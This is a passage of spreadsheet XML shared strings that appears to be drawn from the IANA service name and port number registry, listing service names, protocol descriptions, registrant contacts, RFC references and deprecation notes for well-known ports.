    <t>uucp-rlogin</t>
  </si>
  <si>
    <t>[Stuart_Lynne]</t>
  </si>
  <si>
    <t>commerce</t>
  </si>
  <si>
    <t>[Randy_Epstein]</t>
  </si>
  <si>
    <t>klogin</t>
  </si>
  <si>
    <t>kshell</t>
  </si>
  <si>
    <t>krcmd</t>
  </si>
  <si>
    <t>appleqtcsrvr</t>
  </si>
  <si>
    <t>dhcpv6-client</t>
  </si>
  <si>
    <t>DHCPv6 Client</t>
  </si>
  <si>
    <t>[RFC8415]</t>
  </si>
  <si>
    <t>dhcpv6-server</t>
  </si>
  <si>
    <t>DHCPv6 Server</t>
  </si>
  <si>
    <t>[RFC5460]</t>
  </si>
  <si>
    <t>afpovertcp</t>
  </si>
  <si>
    <t>AFP over TCP</t>
  </si>
  <si>
    <t>[Leland_Wallace]</t>
  </si>
  <si>
    <t>idfp</t>
  </si>
  <si>
    <t>IDFP</t>
  </si>
  <si>
    <t>[Ramana_Kovi]</t>
  </si>
  <si>
    <t>new-rwho</t>
  </si>
  <si>
    <t>new-who</t>
  </si>
  <si>
    <t>[n/a]</t>
  </si>
  <si>
    <t>cybercash</t>
  </si>
  <si>
    <t>[Donald_E_Eastlake]</t>
  </si>
  <si>
    <t>[RFC1898]</t>
  </si>
  <si>
    <t>devshr-nts</t>
  </si>
  <si>
    <t>DeviceShare</t>
  </si>
  <si>
    <t>[Benjamin_Rosenberg]</t>
  </si>
  <si>
    <t>pirp</t>
  </si>
  <si>
    <t>rtsp</t>
  </si>
  <si>
    <t>Real Time Streaming Protocol (RTSP)</t>
  </si>
  <si>
    <t>[Rob_Lanphier]</t>
  </si>
  <si>
    <t>dsf</t>
  </si>
  <si>
    <t>remotefs</t>
  </si>
  <si>
    <t>rfs server</t>
  </si>
  <si>
    <t>openvms-sysipc</t>
  </si>
  <si>
    <t>[Alan_Potter]</t>
  </si>
  <si>
    <t>sdnskmp</t>
  </si>
  <si>
    <t>SDNSKMP</t>
  </si>
  <si>
    <t>teedtap</t>
  </si>
  <si>
    <t>TEEDTAP</t>
  </si>
  <si>
    <t>[Charlie_Limoges]</t>
  </si>
  <si>
    <t>rmonitor</t>
  </si>
  <si>
    <t>rmonitord</t>
  </si>
  <si>
    <t>monitor</t>
  </si>
  <si>
    <t>chshell</t>
  </si>
  <si>
    <t>chcmd</t>
  </si>
  <si>
    <t>nntps</t>
  </si>
  <si>
    <t>nntp protocol over TLS/SSL (was snntp)</t>
  </si>
  <si>
    <t>[RFC4642]</t>
  </si>
  <si>
    <t>9pfs</t>
  </si>
  <si>
    <t>plan 9 file service</t>
  </si>
  <si>
    <t>whoami</t>
  </si>
  <si>
    <t>streettalk</t>
  </si>
  <si>
    <t>banyan-rpc</t>
  </si>
  <si>
    <t>[Tom_Lemaire]</t>
  </si>
  <si>
    <t>ms-shuttle</t>
  </si>
  <si>
    <t>microsoft shuttle</t>
  </si>
  <si>
    <t>[Rudolph_Balaz]</t>
  </si>
  <si>
    <t>ms-rome</t>
  </si>
  <si>
    <t>microsoft rome</t>
  </si>
  <si>
    <t>meter</t>
  </si>
  <si>
    <t>demon</t>
  </si>
  <si>
    <t>udemon</t>
  </si>
  <si>
    <t>sonar</t>
  </si>
  <si>
    <t>[Keith_Moore]</t>
  </si>
  <si>
    <t>banyan-vip</t>
  </si>
  <si>
    <t>[Denis_Leclerc]</t>
  </si>
  <si>
    <t>ftp-agent</t>
  </si>
  <si>
    <t>FTP Software Agent System</t>
  </si>
  <si>
    <t>[Michael_S_Greenberg]</t>
  </si>
  <si>
    <t>vemmi</t>
  </si>
  <si>
    <t>VEMMI</t>
  </si>
  <si>
    <t>[Daniel_Mavrakis_2]</t>
  </si>
  <si>
    <t>ipcd</t>
  </si>
  <si>
    <t>vnas</t>
  </si>
  <si>
    <t>ipdd</t>
  </si>
  <si>
    <t>[Jay_Farhat]</t>
  </si>
  <si>
    <t>decbsrv</t>
  </si>
  <si>
    <t>[Rudi_Martin]</t>
  </si>
  <si>
    <t>sntp-heartbeat</t>
  </si>
  <si>
    <t>SNTP HEARTBEAT</t>
  </si>
  <si>
    <t>[Louis_Mamakos_2]</t>
  </si>
  <si>
    <t>bdp</t>
  </si>
  <si>
    <t>Bundle Discovery Protocol</t>
  </si>
  <si>
    <t>[Gary_Malkin]</t>
  </si>
  <si>
    <t>scc-security</t>
  </si>
  <si>
    <t>SCC Security</t>
  </si>
  <si>
    <t>[Prashant_Dholakia]</t>
  </si>
  <si>
    <t>philips-vc</t>
  </si>
  <si>
    <t>Philips Video-Conferencing</t>
  </si>
  <si>
    <t>[Janna_Chang]</t>
  </si>
  <si>
    <t>keyserver</t>
  </si>
  <si>
    <t>Key Server</t>
  </si>
  <si>
    <t>[Gary_Howland]</t>
  </si>
  <si>
    <t>De-registered</t>
  </si>
  <si>
    <t>Use of 585 is not recommended, use 993 instead</t>
  </si>
  <si>
    <t>password-chg</t>
  </si>
  <si>
    <t>Password Change</t>
  </si>
  <si>
    <t>submission</t>
  </si>
  <si>
    <t>Message Submission</t>
  </si>
  <si>
    <t>[RFC6409]</t>
  </si>
  <si>
    <t>cal</t>
  </si>
  <si>
    <t>CAL</t>
  </si>
  <si>
    <t>[Myron_Hattig]</t>
  </si>
  <si>
    <t>eyelink</t>
  </si>
  <si>
    <t>EyeLink</t>
  </si>
  <si>
    <t>[Dave_Stampe]</t>
  </si>
  <si>
    <t>tns-cml</t>
  </si>
  <si>
    <t>TNS CML</t>
  </si>
  <si>
    <t>[Jerome_Albin]</t>
  </si>
  <si>
    <t>http-alt</t>
  </si>
  <si>
    <t>FileMaker, Inc. - HTTP Alternate (see Port 80)</t>
  </si>
  <si>
    <t>[Clay_Maeckel]</t>
  </si>
  <si>
    <t>eudora-set</t>
  </si>
  <si>
    <t>Eudora Set</t>
  </si>
  <si>
    <t>http-rpc-epmap</t>
  </si>
  <si>
    <t>HTTP RPC Ep Map</t>
  </si>
  <si>
    <t>[Edward_Reus]</t>
  </si>
  <si>
    <t>tpip</t>
  </si>
  <si>
    <t>TPIP</t>
  </si>
  <si>
    <t>[Brad_Spear]</t>
  </si>
  <si>
    <t>cab-protocol</t>
  </si>
  <si>
    <t>CAB Protocol</t>
  </si>
  <si>
    <t>[Winston_Hetherington]</t>
  </si>
  <si>
    <t>smsd</t>
  </si>
  <si>
    <t>SMSD</t>
  </si>
  <si>
    <t>[Wayne_Barlow]</t>
  </si>
  <si>
    <t>ptcnameservice</t>
  </si>
  <si>
    <t>PTC Name Service</t>
  </si>
  <si>
    <t>[Yuri_Machkasov]</t>
  </si>
  <si>
    <t>sco-websrvrmg3</t>
  </si>
  <si>
    <t>SCO Web Server Manager 3</t>
  </si>
  <si>
    <t>[Simon_Baldwin]</t>
  </si>
  <si>
    <t>acp</t>
  </si>
  <si>
    <t>Aeolon Core Protocol</t>
  </si>
  <si>
    <t>[Michael_Alyn_Miller]</t>
  </si>
  <si>
    <t>ipcserver</t>
  </si>
  <si>
    <t>Sun IPC server</t>
  </si>
  <si>
    <t>[Bill_Schiefelbein]</t>
  </si>
  <si>
    <t>syslog-conn</t>
  </si>
  <si>
    <t>Reliable Syslog Service</t>
  </si>
  <si>
    <t>[RFC3195]</t>
  </si>
  <si>
    <t>xmlrpc-beep</t>
  </si>
  <si>
    <t>XML-RPC over BEEP</t>
  </si>
  <si>
    <t>[RFC3529]</t>
  </si>
  <si>
    <t>idxp</t>
  </si>
  <si>
    <t>IDXP</t>
  </si>
  <si>
    <t>[RFC4767]</t>
  </si>
  <si>
    <t>tunnel</t>
  </si>
  <si>
    <t>TUNNEL</t>
  </si>
  <si>
    <t>[RFC3620]</t>
  </si>
  <si>
    <t>soap-beep</t>
  </si>
  <si>
    <t>SOAP over BEEP</t>
  </si>
  <si>
    <t>[RFC4227]</t>
  </si>
  <si>
    <t>urm</t>
  </si>
  <si>
    <t>Cray Unified Resource Manager</t>
  </si>
  <si>
    <t>nqs</t>
  </si>
  <si>
    <t>sift-uft</t>
  </si>
  <si>
    <t>Sender-Initiated/Unsolicited File Transfer</t>
  </si>
  <si>
    <t>[Rick_Troth]</t>
  </si>
  <si>
    <t>npmp-trap</t>
  </si>
  <si>
    <t>npmp-local</t>
  </si>
  <si>
    <t>npmp-gui</t>
  </si>
  <si>
    <t>[John_Barnes]</t>
  </si>
  <si>
    <t>hmmp-ind</t>
  </si>
  <si>
    <t>HMMP Indication</t>
  </si>
  <si>
    <t>hmmp-op</t>
  </si>
  <si>
    <t>HMMP Operation</t>
  </si>
  <si>
    <t>[Andrew_Sinclair]</t>
  </si>
  <si>
    <t>sshell</t>
  </si>
  <si>
    <t>SSLshell</t>
  </si>
  <si>
    <t>[Simon_J_Gerraty]</t>
  </si>
  <si>
    <t>sco-inetmgr</t>
  </si>
  <si>
    <t>Internet Configuration Manager</t>
  </si>
  <si>
    <t>sco-sysmgr</t>
  </si>
  <si>
    <t>SCO System Administration Server</t>
  </si>
  <si>
    <t>sco-dtmgr</t>
  </si>
  <si>
    <t>SCO Desktop Administration Server</t>
  </si>
  <si>
    <t>[Christopher_Durham]</t>
  </si>
  <si>
    <t>dei-icda</t>
  </si>
  <si>
    <t>DEI-ICDA</t>
  </si>
  <si>
    <t>[David_Turner]</t>
  </si>
  <si>
    <t>compaq-evm</t>
  </si>
  <si>
    <t>Compaq EVM</t>
  </si>
  <si>
    <t>[Jem_Treadwell]</t>
  </si>
  <si>
    <t>sco-websrvrmgr</t>
  </si>
  <si>
    <t>SCO WebServer Manager</t>
  </si>
  <si>
    <t>escp-ip</t>
  </si>
  <si>
    <t>ESCP</t>
  </si>
  <si>
    <t>[Lai_Zit_Seng]</t>
  </si>
  <si>
    <t>collaborator</t>
  </si>
  <si>
    <t>Collaborator</t>
  </si>
  <si>
    <t>[Johnson_Davis]</t>
  </si>
  <si>
    <t>oob-ws-http</t>
  </si>
  <si>
    <t>DMTF out-of-band web services management protocol</t>
  </si>
  <si>
    <t>[Jim_Davis]</t>
  </si>
  <si>
    <t>2007-06</t>
  </si>
  <si>
    <t>asf-rmcp</t>
  </si>
  <si>
    <t>ASF Remote Management and Control Protocol</t>
  </si>
  <si>
    <t>[Carl_First]</t>
  </si>
  <si>
    <t>cryptoadmin</t>
  </si>
  <si>
    <t>Crypto Admin</t>
  </si>
  <si>
    <t>[Tony_Walker]</t>
  </si>
  <si>
    <t>dec-dlm</t>
  </si>
  <si>
    <t>DEC DLM
IANA assigned this well-formed service name as a replacement for "dec_dlm".</t>
  </si>
  <si>
    <t>[Rudi_Martin_2]</t>
  </si>
  <si>
    <t>dec_dlm</t>
  </si>
  <si>
    <t>DEC DLM</t>
  </si>
  <si>
    <t>This entry is an alias to "dec-dlm".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>asia</t>
  </si>
  <si>
    <t>ASIA</t>
  </si>
  <si>
    <t>[Michael_Dasenbrock]</t>
  </si>
  <si>
    <t>passgo-tivoli</t>
  </si>
  <si>
    <t>PassGo Tivoli</t>
  </si>
  <si>
    <t>[John_Rainford_2]</t>
  </si>
  <si>
    <t>qmqp</t>
  </si>
  <si>
    <t>QMQP</t>
  </si>
  <si>
    <t>3com-amp3</t>
  </si>
  <si>
    <t>3Com AMP3</t>
  </si>
  <si>
    <t>[Prakash_Banthia]</t>
  </si>
  <si>
    <t>rda</t>
  </si>
  <si>
    <t>RDA</t>
  </si>
  <si>
    <t>[John_Hadjioannou]</t>
  </si>
  <si>
    <t>ipp</t>
  </si>
  <si>
    <t>IPP (Internet Printing Protocol)</t>
  </si>
  <si>
    <t>[RFC8011]</t>
  </si>
  <si>
    <t>Defined TXT keys: See BonjourPrinting.pdf.</t>
  </si>
  <si>
    <t>ipps</t>
  </si>
  <si>
    <t>Internet Printing Protocol over HTTPS</t>
  </si>
  <si>
    <t>bmpp</t>
  </si>
  <si>
    <t>[Troy_Rollo]</t>
  </si>
  <si>
    <t>servstat</t>
  </si>
  <si>
    <t>Service Status update (Sterling Software)</t>
  </si>
  <si>
    <t>[Greg_Rose]</t>
  </si>
  <si>
    <t>ginad</t>
  </si>
  <si>
    <t>[Mark_Crother]</t>
  </si>
  <si>
    <t>rlzdbase</t>
  </si>
  <si>
    <t>RLZ DBase</t>
  </si>
  <si>
    <t>[Michael_Ginn]</t>
  </si>
  <si>
    <t>ldaps</t>
  </si>
  <si>
    <t>ldap protocol over TLS/SSL (was sldap)</t>
  </si>
  <si>
    <t>[Pat_Richard]</t>
  </si>
  <si>
    <t>lanserver</t>
  </si>
  <si>
    <t>[Chris_Larsson]</t>
  </si>
  <si>
    <t>mcns-sec</t>
  </si>
  <si>
    <t>[Kaz_Ozawa]</t>
  </si>
  <si>
    <t>msdp</t>
  </si>
  <si>
    <t>MSDP</t>
  </si>
  <si>
    <t>entrust-sps</t>
  </si>
  <si>
    <t>[Marek_Buchler]</t>
  </si>
  <si>
    <t>repcmd</t>
  </si>
  <si>
    <t>[Scott_Dale]</t>
  </si>
  <si>
    <t>esro-emsdp</t>
  </si>
  <si>
    <t>ESRO-EMSDP V1.3</t>
  </si>
  <si>
    <t>[Mohsen_Banan_2]</t>
  </si>
  <si>
    <t>sanity</t>
  </si>
  <si>
    <t>SANity</t>
  </si>
  <si>
    <t>[Peter_Viscarola]</t>
  </si>
  <si>
    <t>dwr</t>
  </si>
  <si>
    <t>[Bill_Fenner]</t>
  </si>
  <si>
    <t>pssc</t>
  </si>
  <si>
    <t>PSSC</t>
  </si>
  <si>
    <t>[Egon_Meier_Engelen]</t>
  </si>
  <si>
    <t>ldp</t>
  </si>
  <si>
    <t>LDP</t>
  </si>
  <si>
    <t>[Bob_Thomas]</t>
  </si>
  <si>
    <t>dhcp-failover</t>
  </si>
  <si>
    <t>DHCP Failover</t>
  </si>
  <si>
    <t>[RFC8156]</t>
  </si>
  <si>
    <t>[Bernard_Volz]</t>
  </si>
  <si>
    <t>rrp</t>
  </si>
  <si>
    <t>Registry Registrar Protocol (RRP)</t>
  </si>
  <si>
    <t>[Scott_Hollenbeck]</t>
  </si>
  <si>
    <t>cadview-3d</t>
  </si>
  <si>
    <t>Cadview-3d - streaming 3d models over the internet</t>
  </si>
  <si>
    <t>[David_Cooper]</t>
  </si>
  <si>
    <t>obex</t>
  </si>
  <si>
    <t>OBEX</t>
  </si>
  <si>
    <t>[Jeff_Garbers]</t>
  </si>
  <si>
    <t>ieee-mms</t>
  </si>
  <si>
    <t>IEEE MMS</t>
  </si>
  <si>
    <t>[Curtis_Anderson]</t>
  </si>
  <si>
    <t>hello-port</t>
  </si>
  <si>
    <t>HELLO_PORT</t>
  </si>
  <si>
    <t>[Patrick_Cipiere]</t>
  </si>
  <si>
    <t>repscmd</t>
  </si>
  <si>
    <t>RepCmd</t>
  </si>
  <si>
    <t>[Scott_Dale_2]</t>
  </si>
  <si>
    <t>aodv</t>
  </si>
  <si>
    <t>AODV</t>
  </si>
  <si>
    <t>[Charles_Perkins]</t>
  </si>
  <si>
    <t>tinc</t>
  </si>
  <si>
    <t>TINC</t>
  </si>
  <si>
    <t>[Ivo_Timmermans]</t>
  </si>
  <si>
    <t>spmp</t>
  </si>
  <si>
    <t>SPMP</t>
  </si>
  <si>
    <t>[Jakob_Kaivo]</t>
  </si>
  <si>
    <t>rmc</t>
  </si>
  <si>
    <t>RMC</t>
  </si>
  <si>
    <t>[Michael_Schmidt]</t>
  </si>
  <si>
    <t>tenfold</t>
  </si>
  <si>
    <t>TenFold</t>
  </si>
  <si>
    <t>[Louis_Olszyk]</t>
  </si>
  <si>
    <t>Removed</t>
  </si>
  <si>
    <t>mac-srvr-admin</t>
  </si>
  <si>
    <t>MacOS Server Admin</t>
  </si>
  <si>
    <t>[Forest_Hill]</t>
  </si>
  <si>
    <t>hap</t>
  </si>
  <si>
    <t>HAP</t>
  </si>
  <si>
    <t>[Igor_Plotnikov]</t>
  </si>
  <si>
    <t>pftp</t>
  </si>
  <si>
    <t>PFTP</t>
  </si>
  <si>
    <t>[Ben_Schluricke]</t>
  </si>
  <si>
    <t>purenoise</t>
  </si>
  <si>
    <t>PureNoise</t>
  </si>
  <si>
    <t>[Sam_Osa]</t>
  </si>
  <si>
    <t>oob-ws-https</t>
  </si>
  <si>
    <t>DMTF out-of-band secure web services management protocol</t>
  </si>
  <si>
    <t>asf-secure-rmcp</t>
  </si>
  <si>
    <t>ASF Secure Remote Management and Control Protocol</t>
  </si>
  <si>
    <t>sun-dr</t>
  </si>
  <si>
    <t>Sun DR</t>
  </si>
  <si>
    <t>[Harinder_Bhasin]</t>
  </si>
  <si>
    <t>mdqs</t>
  </si>
  <si>
    <t>doom</t>
  </si>
  <si>
    <t>doom Id Software</t>
  </si>
  <si>
    <t>[ddt]</t>
  </si>
  <si>
    <t>disclose</t>
  </si>
  <si>
    <t>campaign contribution disclosures - SDR Technologies</t>
  </si>
  <si>
    <t>[Jim_Dixon]</t>
  </si>
  <si>
    <t>mecomm</t>
  </si>
  <si>
    <t>MeComm</t>
  </si>
  <si>
    <t>meregister</t>
  </si>
  <si>
    <t>MeRegister</t>
  </si>
  <si>
    <t>[Armin_Sawusch]</t>
  </si>
  <si>
    <t>vacdsm-sws</t>
  </si>
  <si>
    <t>VACDSM-SWS</t>
  </si>
  <si>
    <t>vacdsm-app</t>
  </si>
  <si>
    <t>VACDSM-APP</t>
  </si>
  <si>
    <t>vpps-qua</t>
  </si>
  <si>
    <t>VPPS-QUA</t>
  </si>
  <si>
    <t>cimplex</t>
  </si>
  <si>
    <t>CIMPLEX</t>
  </si>
  <si>
    <t>[Ulysses_G_Smith_Jr]</t>
  </si>
  <si>
    <t>acap</t>
  </si>
  <si>
    <t>ACAP</t>
  </si>
  <si>
    <t>[Chris_Newman]</t>
  </si>
  <si>
    <t>dctp</t>
  </si>
  <si>
    <t>DCTP</t>
  </si>
  <si>
    <t>[Andre_Kramer]</t>
  </si>
  <si>
    <t>vpps-via</t>
  </si>
  <si>
    <t>VPPS Via</t>
  </si>
  <si>
    <t>vpp</t>
  </si>
  <si>
    <t>Virtual Presence Protocol</t>
  </si>
  <si>
    <t>[Klaus_Wolf]</t>
  </si>
  <si>
    <t>ggf-ncp</t>
  </si>
  <si>
    <t>GNU Generation Foundation NCP</t>
  </si>
  <si>
    <t>[Noah_Paul]</t>
  </si>
  <si>
    <t>mrm</t>
  </si>
  <si>
    <t>MRM</t>
  </si>
  <si>
    <t>[Liming_Wei]</t>
  </si>
  <si>
    <t>entrust-aaas</t>
  </si>
  <si>
    <t>entrust-aams</t>
  </si>
  <si>
    <t>[Adrian_Mancini]</t>
  </si>
  <si>
    <t>xfr</t>
  </si>
  <si>
    <t>XFR</t>
  </si>
  <si>
    <t>[Noah_Paul_2]</t>
  </si>
  <si>
    <t>corba-iiop</t>
  </si>
  <si>
    <t>CORBA IIOP</t>
  </si>
  <si>
    <t>corba-iiop-ssl</t>
  </si>
  <si>
    <t>CORBA IIOP SSL</t>
  </si>
  <si>
    <t>[Andrew_Watson]</t>
  </si>
  <si>
    <t>mdc-portmapper</t>
  </si>
  <si>
    <t>MDC Port Mapper</t>
  </si>
  <si>
    <t>hcp-wismar</t>
  </si>
  <si>
    <t>Hardware Control Protocol Wismar</t>
  </si>
  <si>
    <t>[David_Merchant]</t>
  </si>
  <si>
    <t>asipregistry</t>
  </si>
  <si>
    <t>[Erik_Sea]</t>
  </si>
  <si>
    <t>realm-rusd</t>
  </si>
  <si>
    <t>ApplianceWare managment protocol</t>
  </si>
  <si>
    <t>[Stacy_Kenworthy]</t>
  </si>
  <si>
    <t>NMAP</t>
  </si>
  <si>
    <t>[Peter_Dennis_Bartok]</t>
  </si>
  <si>
    <t>vatp</t>
  </si>
  <si>
    <t>Velneo Application Transfer Protocol</t>
  </si>
  <si>
    <t>[Velneo]</t>
  </si>
  <si>
    <t>[David_Gutierrez]</t>
  </si>
  <si>
    <t>msexch-routing</t>
  </si>
  <si>
    <t>MS Exchange Routing</t>
  </si>
  <si>
    <t>[David_Lemson]</t>
  </si>
  <si>
    <t>hyperwave-isp</t>
  </si>
  <si>
    <t>Hyperwave-ISP</t>
  </si>
  <si>
    <t>[Gerald_Mesaric]</t>
  </si>
  <si>
    <t>connendp</t>
  </si>
  <si>
    <t>almanid Connection Endpoint</t>
  </si>
  <si>
    <t>[Ronny_Bremer]</t>
  </si>
  <si>
    <t>ha-cluster</t>
  </si>
  <si>
    <t>[Alan_Robertson]</t>
  </si>
  <si>
    <t>ieee-mms-ssl</t>
  </si>
  <si>
    <t>IEEE-MMS-SSL</t>
  </si>
  <si>
    <t>[Curtis_Anderson_2]</t>
  </si>
  <si>
    <t>rushd</t>
  </si>
  <si>
    <t>RUSHD</t>
  </si>
  <si>
    <t>[Greg_Ercolano]</t>
  </si>
  <si>
    <t>uuidgen</t>
  </si>
  <si>
    <t>UUIDGEN</t>
  </si>
  <si>
    <t>[James_Falkner]</t>
  </si>
  <si>
    <t>olsr</t>
  </si>
  <si>
    <t>OLSR</t>
  </si>
  <si>
    <t>[Thomas_Clausen]</t>
  </si>
  <si>
    <t>accessnetwork</t>
  </si>
  <si>
    <t>Access Network</t>
  </si>
  <si>
    <t>[Yingchun_Xu]</t>
  </si>
  <si>
    <t>epp</t>
  </si>
  <si>
    <t>Extensible Provisioning Protocol</t>
  </si>
  <si>
    <t>[RFC5734]</t>
  </si>
  <si>
    <t>lmp</t>
  </si>
  <si>
    <t>Link Management Protocol (LMP)</t>
  </si>
  <si>
    <t>[RFC4204]</t>
  </si>
  <si>
    <t>iris-beep</t>
  </si>
  <si>
    <t>IRIS over BEEP</t>
  </si>
  <si>
    <t>[RFC3983]</t>
  </si>
  <si>
    <t>elcsd</t>
  </si>
  <si>
    <t>errlog copy/server daemon</t>
  </si>
  <si>
    <t>agentx</t>
  </si>
  <si>
    <t>AgentX</t>
  </si>
  <si>
    <t>[Bob_Natale]</t>
  </si>
  <si>
    <t>silc</t>
  </si>
  <si>
    <t>SILC</t>
  </si>
  <si>
    <t>[Pekka_Riikonen]</t>
  </si>
  <si>
    <t>borland-dsj</t>
  </si>
  <si>
    <t>Borland DSJ</t>
  </si>
  <si>
    <t>[Gerg_Cole]</t>
  </si>
  <si>
    <t>entrust-kmsh</t>
  </si>
  <si>
    <t>Entrust Key Management Service Handler</t>
  </si>
  <si>
    <t>entrust-ash</t>
  </si>
  <si>
    <t>Entrust Administration Service Handler</t>
  </si>
  <si>
    <t>cisco-tdp</t>
  </si>
  <si>
    <t>Cisco TDP</t>
  </si>
  <si>
    <t>[Bruce_Davie]</t>
  </si>
  <si>
    <t>tbrpf</t>
  </si>
  <si>
    <t>TBRPF</t>
  </si>
  <si>
    <t>[RFC3684]</t>
  </si>
  <si>
    <t>iris-xpc</t>
  </si>
  <si>
    <t>IRIS over XPC</t>
  </si>
  <si>
    <t>iris-xpcs</t>
  </si>
  <si>
    <t>IRIS over XPCS</t>
  </si>
  <si>
    <t>[RFC4992]</t>
  </si>
  <si>
    <t>iris-lwz</t>
  </si>
  <si>
    <t>IRIS-LWZ</t>
  </si>
  <si>
    <t>[RFC4993]</t>
  </si>
  <si>
    <t>pana</t>
  </si>
  <si>
    <t>PANA Messages</t>
  </si>
  <si>
    <t>[RFC5191]</t>
  </si>
  <si>
    <t>717-728</t>
  </si>
  <si>
    <t>netviewdm1</t>
  </si>
  <si>
    <t>IBM NetView DM/6000 Server/Client</t>
  </si>
  <si>
    <t>netviewdm2</t>
  </si>
  <si>
    <t>IBM NetView DM/6000 send/tcp</t>
  </si>
  <si>
    <t>netviewdm3</t>
  </si>
  <si>
    <t>IBM NetView DM/6000 receive/tcp</t>
  </si>
  <si>
    <t>[Philippe_Binet]</t>
  </si>
  <si>
    <t>732-740</t>
  </si>
  <si>
    <t>netgw</t>
  </si>
  <si>
    <t>netGW</t>
  </si>
  <si>
    <t>[Oliver_Korfmacher]</t>
  </si>
  <si>
    <t>netrcs</t>
  </si>
  <si>
    <t>Network based Rev. Cont. Sys.</t>
  </si>
  <si>
    <t>[Gordon_C_Galligher]</t>
  </si>
  <si>
    <t>flexlm</t>
  </si>
  <si>
    <t>Flexible License Manager</t>
  </si>
  <si>
    <t>[Matt_Christiano]</t>
  </si>
  <si>
    <t>745-746</t>
  </si>
  <si>
    <t>fujitsu-dev</t>
  </si>
  <si>
    <t>Fujitsu Device Control</t>
  </si>
  <si>
    <t>ris-cm</t>
  </si>
  <si>
    <t>Russell Info Sci Calendar Manager</t>
  </si>
  <si>
    <t>kerberos-adm</t>
  </si>
  <si>
    <t>kerberos administration</t>
  </si>
  <si>
    <t>rfile</t>
  </si>
  <si>
    <t>loadav</t>
  </si>
  <si>
    <t>kerberos-iv</t>
  </si>
  <si>
    <t>kerberos version iv</t>
  </si>
  <si>
    <t>pump</t>
  </si>
  <si>
    <t>qrh</t>
  </si>
  <si>
    <t>rrh</t>
  </si>
  <si>
    <t>tell</t>
  </si>
  <si>
    <t>[Josyula_R_Rao]</t>
  </si>
  <si>
    <t>755-757</t>
  </si>
  <si>
    <t>nlogin</t>
  </si>
  <si>
    <t>con</t>
  </si>
  <si>
    <t>ns</t>
  </si>
  <si>
    <t>rxe</t>
  </si>
  <si>
    <t>quotad</t>
  </si>
  <si>
    <t>cycleserv</t>
  </si>
  <si>
    <t>omserv</t>
  </si>
  <si>
    <t>webster</t>
  </si>
  <si>
    <t>phonebook</t>
  </si>
  <si>
    <t>phone</t>
  </si>
  <si>
    <t>vid</t>
  </si>
  <si>
    <t>cadlock</t>
  </si>
  <si>
    <t>rtip</t>
  </si>
  <si>
    <t>cycleserv2</t>
  </si>
  <si>
    <t>submit</t>
  </si>
  <si>
    <t>notify</t>
  </si>
  <si>
    <t>rpasswd</t>
  </si>
  <si>
    <t>acmaint-dbd</t>
  </si>
  <si>
    <t>IANA assigned this well-formed service name as a replacement for "acmaint_dbd".</t>
  </si>
  <si>
    <t>acmaint_dbd</t>
  </si>
  <si>
    <t>This entry is an alias to "acmaint-dbd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>entomb</t>
  </si>
  <si>
    <t>acmaint-transd</t>
  </si>
  <si>
    <t>IANA assigned this well-formed service name as a replacement for "acmaint_transd".</t>
  </si>
  <si>
    <t>acmaint_transd</t>
  </si>
  <si>
    <t>This entry is an alias to "acmaint-transd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>wpages</t>
  </si>
  <si>
    <t>multiling-http</t>
  </si>
  <si>
    <t>Multiling HTTP</t>
  </si>
  <si>
    <t>[Alejandro_Bonet]</t>
  </si>
  <si>
    <t>778-779</t>
  </si>
  <si>
    <t>wpgs</t>
  </si>
  <si>
    <t>781-785</t>
  </si>
  <si>
    <t>788-799</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 796</t>
  </si>
  <si>
    <t>mdbs-daemon</t>
  </si>
  <si>
    <t>IANA assigned this well-formed service name as a replacement for "mdbs_daemon".</t>
  </si>
  <si>
    <t>mdbs_daemon</t>
  </si>
  <si>
    <t>This entry is an alias to "mdbs-daemon".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>device</t>
  </si>
  <si>
    <t>mbap-s</t>
  </si>
  <si>
    <t>Modbus Application Protocol Secure</t>
  </si>
  <si>
    <t>803-809</t>
  </si>
  <si>
    <t>fcp-udp</t>
  </si>
  <si>
    <t>FCP</t>
  </si>
  <si>
    <t>[Paul_Whittemore]</t>
  </si>
  <si>
    <t>FCP Datagram</t>
  </si>
  <si>
    <t>811-827</t>
  </si>
  <si>
    <t>itm-mcell-s</t>
  </si>
  <si>
    <t>[Portnoy_Boxman]</t>
  </si>
  <si>
    <t>pkix-3-ca-ra</t>
  </si>
  <si>
    <t>PKIX-3 CA/RA</t>
  </si>
  <si>
    <t>[Carlisle_Adams]</t>
  </si>
  <si>
    <t>netconf-ssh</t>
  </si>
  <si>
    <t>NETCONF over SSH</t>
  </si>
  <si>
    <t>[RFC6242]</t>
  </si>
  <si>
    <t>netconf-beep</t>
  </si>
  <si>
    <t>NETCONF over BEEP</t>
  </si>
  <si>
    <t>[RFC4744]</t>
  </si>
  <si>
    <t>netconfsoaphttp</t>
  </si>
  <si>
    <t>NETCONF for SOAP over HTTPS</t>
  </si>
  <si>
    <t>[RFC4743]</t>
  </si>
  <si>
    <t>netconfsoapbeep</t>
  </si>
  <si>
    <t>NETCONF for SOAP over BEEP</t>
  </si>
  <si>
    <t>834-846</t>
  </si>
  <si>
    <t>dhcp-failover2</t>
  </si>
  <si>
    <t>dhcp-failover 2</t>
  </si>
  <si>
    <t>gdoi</t>
  </si>
  <si>
    <t>GDOI</t>
  </si>
  <si>
    <t>[RFC3547]</t>
  </si>
  <si>
    <t>849-852</t>
  </si>
  <si>
    <t>domain-s</t>
  </si>
  <si>
    <t>DNS query-response protocol run over TLS/DTLS</t>
  </si>
  <si>
    <t>[RFC7858][RFC8094]</t>
  </si>
  <si>
    <t>dlep</t>
  </si>
  <si>
    <t>Dynamic Link Exchange Protocol (DLEP)</t>
  </si>
  <si>
    <t>[RFC8175]</t>
  </si>
  <si>
    <t>855-859</t>
  </si>
  <si>
    <t>iscsi</t>
  </si>
  <si>
    <t>iSCSI</t>
  </si>
  <si>
    <t>[RFC7143]</t>
  </si>
  <si>
    <t>owamp-control</t>
  </si>
  <si>
    <t>OWAMP-Control</t>
  </si>
  <si>
    <t>[RFC4656]</t>
  </si>
  <si>
    <t>owamp-test</t>
  </si>
  <si>
    <t>OWAMP-Test</t>
  </si>
  <si>
    <t>[RFC8545]</t>
  </si>
  <si>
    <t>twamp-control</t>
  </si>
  <si>
    <t>TWAMP-Control</t>
  </si>
  <si>
    <t>[RFC5357]</t>
  </si>
  <si>
    <t>twamp-test</t>
  </si>
